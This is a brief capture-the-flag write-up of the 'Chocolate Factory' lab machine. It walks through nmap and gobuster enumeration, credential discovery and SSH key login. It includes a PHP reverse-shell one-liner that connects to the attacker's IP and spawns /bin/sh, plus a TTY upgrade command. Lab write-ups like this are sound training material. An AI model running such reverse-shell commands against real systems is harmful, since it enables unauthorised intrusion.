Chocolate Factory

Is it responding for ping request ?

yes its working.

Let’s go with the traditional method,

Enumeration

nmap -p- -A -T4 10.10.143.180

• -p- scans for all ports.
• -A finds OS, services and the versions.
• -T4 for speed template
• you can use “-v” or “-vv” to set it in verbose mode.

After a long time of waiting, this gave me a lot of info, there are some hints tooo but they are of no use.

Now lets come one by one.

Found a web server running.

I tried SQLi and auth bypass but nothing came up.

lets escalate it more by using gobuster.

I found home.php

Ok, there is a command shell, and in validate.php it is asking for credentials, so I will try to pop a reverse shell here by using netcat.

Start a netcat listener and execute this command

php -r '$sock=fsockopen("10.8.151.122",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Yooo, we got a shell

we are in www-data

Now Upgrade TTY Shell.

script -qc /bin/bash /dev/null

Now here key_rev_key looks interesting, lets look closer by using strings

OK, we found the key, now lets check each and every file in the directory, so that we can find something.

Yes we got credentials in validate.php.

Now, since we got credentials of charlie, change user to charlie, and you will find user.txt, but we don’t have permissions to open that file.

Now What ?, Lets check all the files for any info

Ok, we got both public and private SSH keys.

Now Save the key in one file and login using that key in SSH.

BOOM

Lets Escalate it more to play GOD on this machine,

This is the greatest rush, GOD Access.

The feeling never gets old.

Thanks for Scrolling Down.

Rithvik Reddy.